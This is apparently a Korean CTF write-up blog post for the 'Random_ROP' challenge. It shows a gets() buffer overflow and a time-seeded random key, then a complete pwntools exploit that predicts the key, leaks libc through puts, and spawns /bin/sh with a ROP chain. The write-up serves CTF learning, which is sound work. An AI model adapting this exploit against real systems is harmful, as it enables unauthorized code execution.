The_hacking_championship_junior Writeup

LeeDoHyun · May 13, 2020

dsec ctf 예선때 못풀었던 문제인데 다시 보니 쉬운문제였습니다.

__int64 vuln()
{
  char v1; // [rsp+0h] [rbp-400h]

  puts(&byte_400C18);
  gets(&v1);
  write(1, "OK!\n", 4uLL);
  return 0LL;
}

#취약점 발생함수.

__int64 random_key()
{
  unsigned int v0; // eax

  v0 = time(0LL);
  srand(v0);
  return rand();
}

#랜덤키 함수

그냥 python ctypes에 CDLL을 사용해서 libc연결시켜주고 동시에 시작하면 같은 값이 나옵니다. 나머지는 그냥 ROP 입니다.

ex.py

#!/usr/bin/env python2
#-*-coding:utf8-*-

from pwn import *
from ctypes import CDLL

context.log_level = 'debug'
r = process('./Random_ROP')
c = CDLL('libc.so.6')
libc = ELF('libc.so.6')
e = ELF('./Random_ROP')

pop_rdi = 0x0000000000400b43
puts_plt = e.plt['puts']
puts_got = e.got['puts']
vuln = e.symbols['vuln']
ret = 0x00000000004006e9

r.recvuntil('INPUT ID :')
r.sendline('a')
r.recvuntil('INPUT PW :')
r.sendline('a')

data = c.time(0)
c.srand(data)
random_key = c.rand()
r.recvuntil('인증키를 입력해 주세요')
r.sendline(str(random_key))

log.success('random key = {}'.format(str(random_key)))

r.recvuntil('원하시는 도움을 입력해주세요!')
payload = 'a'*(0x400 + 0x8)
payload += p64(pop_rdi)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(vuln)
r.sendline(payload)

r.recvuntil('OK!\n')

puts_leak = u64(r.recvuntil('\x7f')[-6:] + '\x00\x00')
libc_base = puts_leak - libc.symbols['puts']
system = libc_base + libc.symbols['system']
binsh = libc_base + libc.search('/bin/sh').next()

log.success('puts leak : {}'.format(hex(puts_leak)))
log.success('libc base : {}'.format(hex(libc_base)))
log.success('system addr : {}'.format(hex(system)))
log.success('binsh addr : {}'.format(hex(binsh)))

payload = 'a'*(0x400 + 0x8)
payload += p64(pop_rdi)
payload += p64(binsh)
payload += p64(ret)
payload += p64(system)
r.sendline(payload)
r.interactive()

Twitter, Facebook